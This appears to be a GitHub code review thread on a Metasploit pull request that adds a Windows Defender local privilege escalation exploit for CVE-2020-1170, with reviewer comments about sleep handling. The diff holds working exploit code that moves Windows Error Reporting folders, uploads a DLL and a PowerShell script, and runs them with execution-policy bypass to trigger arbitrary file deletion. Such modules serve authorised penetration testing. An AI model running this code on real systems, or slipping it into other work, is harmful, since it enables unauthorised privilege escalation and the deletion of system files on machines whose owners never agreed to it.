modules/exploits/windows/local/cve_2020_1170_windows_defender_lpe.rb

```diff
@@ -0,0 +1,219 @@
+    cd(relocation_dir)
+    print_status("After CD...")
+
+    # I was going to use rename_file here but it doesn't forcibly move folders when
+    move_folder_result1 = cmd_exec("cmd.exe /C \"move /Y C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive .")
+    print_status(move_folder_result1)
+    move_folder_result1 = cmd_exec("cmd.exe /C \"move /Y C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue .")
+    print_status(move_folder_result1)
+    move_folder_result1 = cmd_exec("cmd.exe /C \"move /Y C:\\ProgramData\\Microsoft\\Windows\\WER\\Temp .")
+    print_status(move_folder_result1)
+
+    print_status("Changing directory back to the writeable directory...")
+    cd(datastore['WriteableDirectory'])
+  end
+
+  def exploit
+    ntapipath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-1170', 'NtApiDotNet.dll')
+    powershell_file_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-1170', "DefenderArbitraryFileDelete.ps1")
+
+    ntapi_target_file_path = datastore['WriteableDirectory'] + "\\" + Rex::Text.rand_text_alpha(6..13) + ".dll"
+    powershell_target_file_path = datastore['WriteableDirectory'] + "\\" + Rex::Text.rand_text_alpha(6..13) + ".ps1"
+
+
+    print_status("Uploading the PowerShell file that will run the main exploit along with the DLL to support its operations...")
+    upload_file(ntapi_target_file_path, ntapipath)
+    upload_file(powershell_target_file_path, powershell_file_path)
+    register_file_for_cleanup(ntapi_target_file_path)
+    register_file_for_cleanup(powershell_target_file_path)
+
+    print_status("Moving folders out of C:\\ProgramData\\Microsoft\\Windows\\WER so that we can delete the folder...")
+    move_folders_out_of_wer # Move subdirectories out of C:\ProgramData\Microsoft\Windows\WER\
+                                      # so that it can be successfully deleted.
+
+    # Taken from @itm4n's PoC code and his exploit from https://github.com/itm4n/CVEs/blob/master/CVE-2020-1170/DefenderArbitraryFileDelete.ps1
+    command_to_execute = "powershell -ep bypass -c \". #{powershell_target_file_path}; DoMain -TargetFolder 'C:\\ProgramData\\Microsoft\\Windows\\WER' -NtApiDLLPath '#{ntapi_target_file_path}'\""
+    print_status(command_to_execute.to_s)
+    print_status("Triggering the vulnerability, this usually takes about 40 to 60 minutes to complete...")
+    result = cmd_exec(command_to_execute, nil, 3600)
+    if result =~ /success/
+      print_good("Successfully triggered the arbitrary file deletion vulnerability!")
+    elsif result =~ /fail/
+      fail_with(Failure::UnexpectedReply,"Failed to trigger the arbitrary file deletion vulnerability!")
+    else
+      print_error("Unknown error occurred whilst trying to run the PowerShell script!")
+      print(result.to_s)
+    end
+
+    print_status("Sleeping for 30 seconds to ensure any extra operations on the WER directory go through before we try and clear it up.")
+    sleep(30)
```

Comment:
I believe `Rex.sleep` is preferred. I don't remember why.

```suggestion
    wait = 30
    print_status("Sleeping for #{wait} seconds to ensure any extra operations on the WER directory go through before we try and clear it up.")
    Rex.sleep(wait)
```

Reply:
It looks like the global/kernel sleep is monkey patched to be thread safe:

https://github.com/rapid7/metasploit-framework/blob/8926b1893ef31ea40a5582ddbe27d2b92c3c3074/lib/rex.rb#L123-L128

And checking out the irb console in metsaploit shows `Rex.sleep` and the kernel `sleep` are actually same:

```
msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object

>> Rex.method(:sleep)
=> #<Method: Module(Kernel)#sleep>
>> Rex.method(:sleep).source_location
=> ["(eval)", 2]
>> method(:sleep).source_location
=> ["(eval)", 2]
```

I don't _think_ this change is needed? Any extra context would be appreciated though! 👀

Reply:
No, but defining the wait time in a variable would make is easier to change in future.

Reply:
Sounds good to me! Maybe it could be added as a module option - but I don't have strong opinions on that 📈

Reply:
I'll add the option to specify the sleep time in seconds in as a module option as I was actually thinking of doing this to allow a bit more flexibility in the module overall. Will keep the `sleep` the command the same due to @adfoster-r7's observations.

Reply:
Ok this should be fixed with the next commit.